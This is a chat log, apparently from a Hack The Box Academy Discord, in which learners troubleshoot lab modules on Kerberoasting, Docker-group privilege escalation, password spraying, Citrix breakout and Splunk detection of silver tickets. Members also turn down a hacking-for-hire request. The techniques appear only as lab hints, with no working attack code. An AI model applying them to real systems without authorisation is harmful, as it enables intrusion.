Which is why I'm taking the effort to re-do the earlier sections. (Ldapsearch)
It also helps me reaffirm techniques that would help me later
Always good to recap, and that moment when you're running through and realise "shit, I know this". It's a great feeling.
Yeah because doing it in windows was natural, but doing it in Linux was so foreign (even though it was the same damn thing) I also tend to mess with the commands to learn what I can also search for
Like learning "hey I can just have it output x,y,z from the search instead of a wall of text to parse"
Module - Intro to windows command line
section - skills assessment
How many hidden files exist on user3's Desktop?
it is not working
0 is not the answer
are you using the right user? what happens when you run the command without .count
yes
Also that command is missing a flag for hidden
Oh nvm
Try doing it without the .count
And see
Not sure if this is the appropriate place to ask this but on HTB where do people recommend starting out. I have no prior pen experience. Started IT this year so only got the 1 year help desk support primarily on Windows with a lil Mac, also done MS certs AZ-900/SC-900 and ISC2 CC. So just wondering if HTB is a good start point
Academy has an infosec Fundamentals course
Who do you want us to hack this time
yeah I know what the answer is
Am I crazy or is the question wrong?
Cheers, I will check that out
¯\_(ツ)_/¯
Did you read the #rules
dude
that's illegal, no one here is going to do that, re-evaluate your childish behaviour and find something better to do with your time
It falls under illegal activities, just report it to insta and block them
how's the question wrong 
then turn to the police 🤷
its asking me for hidden file but I used
(get-childitem).count
[We are not helping you]
This is the last time we are telling you
This isn't a hacker4hire server
Not here
might be a problem with the target, the files should be hidden
and any server like that will probably scam you out of your money, happily
And most of those end up being scams anyway
yep anyways I got the answer
so do I need to report it to support?
Sad, good luck
I have a question regarding mounts. Do connected devices automatically go to SCSI Disks available such as /dev/sdb? And then in order to access the device you have to mount it to a folder. Am I missing anything?
Marcie like "then perish" 
no just reset it and try again
ok
I mean, reality of it is: be careful what you put on the internet, and who you share it with
If any explicit photos of me got leaked I shrimply would not care, as the moment it left my storage device to go to somewhere else - control is no longer mine
it sucks majorly, but only thing to do is report it wherever applicable
revenge hacking or whatever people imagine wouldn't make it disappear
I believe in keeping it strictly to the brain. Or in a safe if its really something once in a lifetime.
devs added a terminate button on the target. feels good to save resources
¯\_(ツ)_/¯
I mean it's good for completely ending the target and starting a new one instead of hoping 'reset' fixes it
now I can sleep tight knowing I am not making any waste. thanks guys for the help and merry christmas
They die on their own anyway
well thats life
Detecting Windows Attacks with Splunk
Detecting Golden Tickets/Silver Tickets:
For which "service" did the user named Barbi generate a silver ticket?
a bit lost on how to find this service
got the right answer... not using splunk, but checking one of the screenshots of them demonstrating the attack... not sure if that's the intended route. Question is, how to find out which service the ticket is for through splunk
Silver ticket?
never heard of it but thats like on of the last modules
when i get there ill help you out xdd
You have some resources available in the module that you can use with Splunk to investigate. Go from there
The process you need is covered in the module section
The section mentioned a users.csv file. That wasn't the problem.
Thanks for the disposition. Hope you reach your goals soon
TBH, you'll figure it out b4 i reach my "goal"
Definitely not the intended way, and the module taught the steps to find the intended one, but have raised this point with the team.
Can't go any faster than I am.
Excellent observation though 😉
Saturdays and Sundays are dedicated to HTB
I work 110 hours every 2 weeks on average, because my co-workers call out sick and I take their shift to make sure we have coverage.
Coverage for silly AF issues btw
I used both queries shown in the silver ticket option but ticket service isn't one of the fields. Am I being too close minded?
I looked at the associated logs, I filtered by account_name barbi, but couldn't find it
Which is why I'm even doing this in the first place.
Oh you need a PW reset on Saturday because you were too damn lazy to use self-service?
But I digress, going to STFU now because this channel is about modules.
That sucks man
Appreciate your reaction.
Lol. I see you're frustrated. At least it seems it's fueling you to keep going
You in a real Cyber Role?
Nope
Hell even tuning alerts for SIEMs.
Reviewing phishing emails, lmao.
It really is, motivation fueled by anger is only short term, but it's good while it works.
Step by step. Which module are you on?
What a thoughtful question, thanks for asking, I am on Windows Attack And Defense, in the SOC Analyst Tier 1 Path, sounds like you are doing the same but you are almost at the end.
I have my CySA+ scheduled for Jan 12th, but honestly CompTIA certs are vocab tests. I have learned more on the HTB Academy platform than Sec+, CySA+ and CCNA combined.
Yesterday I had the most fun I have ever had going through a module.
Kinda intimidated by the report section, but I know if I can do it, then it will be worth it.
Glad this discord and the company in general exist.
You're in a similar spot as I was, hmm 2 weeks ago. I was on windows attack and defense taking the CySa+ keep at it. Cysa+ is more widely known.
Regarding the report... Hehe I'll only be able to coment once I finish the exam
LOL.
You can always write a mock report and get practice.
Indeed brother, I think you can practice with the approved platform they use beforehand, but yea Sec+ is like the bare bones minimum for a hiring manager to even entertain hiring you. Did you pass the CySA+?
^this
Yup. Passed it 2 weeks ago. Got a 760, passing is 750 😅
Lmao, it was probably mostly theory, I know there's an NDA so you don't have to answer, but going through HTB's CDSA I feel like the CYSA+ should be child's play.
No point to spring for a CASP+ until you land a cyber def/off job anyway, and in that case may as well go for CISSP.
I am only getting it to renew my Sec+.
Congratz btw.
They don't completely overlap. But I'd say the CySa+ was ok. Although I've heard people saying it's child's play. Cdsa helps a bit with it
Anyone ever used the pwn box on mobile?
Yea imo hands on always trumps theory. Even if you don't understand fully what commands you are issuing.
Recommending this conversation be moved over to #cdsa or #careers-and-certs.
This is on topic right? Lol
Giving you a DM @supple gorge .. can't guarantee I can help, but will nudge if I can
Thanks 🙂
You'd need a mobile keyboard to work it
Or go the insane route. Thanks for specifying:))))
I'm back at the ldap query stuff 😢 woo
Tfw I realize why it wasn't working
querying a domain for a local group instead of you know using the local group net command
But I wanna be a pentester /s
There is something going on with the gcspn field. Deleting the search gcspn on the end works
NVM it's not supposed to work...
I'm doing the AD Enumeration & Attacks - Skills Assessment Part 1 and on the question "Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer". I'm trying to do the semi-manual way of kerberoasting but for some reason "Add-Type -AssemblyName System.IdentityModel" is not working. I get this error when attempting to kerberoast a single user: "New-Object : Cannot find type [System.IdentityModel.Tokens.KerberosRequestorSecurityToken]: verify that the assembly containing this type is loaded." What am I missing?
Sometimes it's dumb tbh
try harder it is
Each command is run in a separate PowerShell process on the Antak webshell, so you must use a semicolon to run commands in the same process.
that's why you should ditch webshells asap
I see
Regarding Shells & Payloads - The Live Engagement, Host 2. How can I find out about the username and password?
I found the info in the hint, but how to find the username and password without looking at the hint?
Desktop
It's literally one of the most overlooked things of that assessment lol
🤦♀️
it wasn’t hidden
it was not...I just didn't look properly.
it happens
Hi! Got a question about reporting. Would you report the classic docker privesc (mounting the host filesystem in a container)? If so, how? I'm working on a case where the compromised low-privileged user needs to belong to the docker group. In what type of vulnerability would you classify this?
Hey, could you please help me with the Linux privilege escalation Docker module? When I run docker -H unix:///run/docker.sock ps or docker -H unix:///var/run/docker.sock ps, I get nothing, as it seems that docker image is not running.
run the command docker images to confirm
hey are HTB academy having maintenence or smth rn?
i cant rdp into any module machine 😅
works fine for me , try to restart the target
tried with a couple machines, reset a couple of times, same thing 😅
can anyone help?
its smth from HTB side i think, cuz i tried to do it from the pwnbox and im getting the same thing
It says STATUS_LOGON_FAILURE. That means the credentials you're supplying are wrong.
Wrap the password in single quotes.
The characters are prolly escaping.
the vpn is so laggy and slow, weird
change regions
didnt work
i tried 
where can I learn more about this
you can use a personal vm (idk if it’ll be any faster)
same man
thats what im using
strange
MerryChristmas everybody!
ok so i changed the vpn file to TCP, and it started working just fine
arent vpns usually better UDP?
and thanks to u for the password wrapping thing ❤️
merry christmas everybody
thanks
can’t reliably use rdp with a udp ovpn file
I am new here and wanna learn more
tbh I've always done that, didn't face problems before
strange
about what
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hello, I am doing the Windows privilege escalation module "Citrix Breakout" and I have to open an SMB server with smbserver.py but unfortunately I don't have the tools in the provided machine and I can't upload it from my machine..
Does anyone have this problem ?
the tools are already there
I have the tools like PowerUp on the Ubuntu machine, but I don't have smbserver.py on the Ubuntu machine. I can't upload them to the restricted Windows 7 environment to launch PowerUp
Or maybe i missed something ?
that machine does have smbserver.py
Ah yees i finally found it
mybad
I thought I had to have it in Tools
but i can use it without a path
Anyone who has done the "Intro to Assembly" skill assessment task 1?
I have tried everything that I could but still no luck 😔
In Vulnerability Assessment with nessus, I should be using the vpn to scan, right?
meaning I better switch to linux because it is easier to setup things there...
I tried every option for Q4 in AD Enumeration & Attacks - Skills Assessment Part II
crackmapexec, kerbrute, and even DomainPasswordSpray.ps1
none of them shows me users... What am I missing?
strange
use the tool responder which was covered in the module
It worked for the first q. but not showing another user..
Attacking Common Services - Medium Lab: I can only find 4 open ports? I reset the target many times but I can only find 4 open ports
reset and use the option -p- this time
i did
what question is that?
strange reset and try again
Q4.. I tried all the options for a few days now and it doesn't work..
okayy
a common method like password spraying using common passwords against a list of valid users
Yes.. the problem is how do i find the valid users? all these tools show me only 1 user - A***, which I used for the first question
read the man page of crackmapexec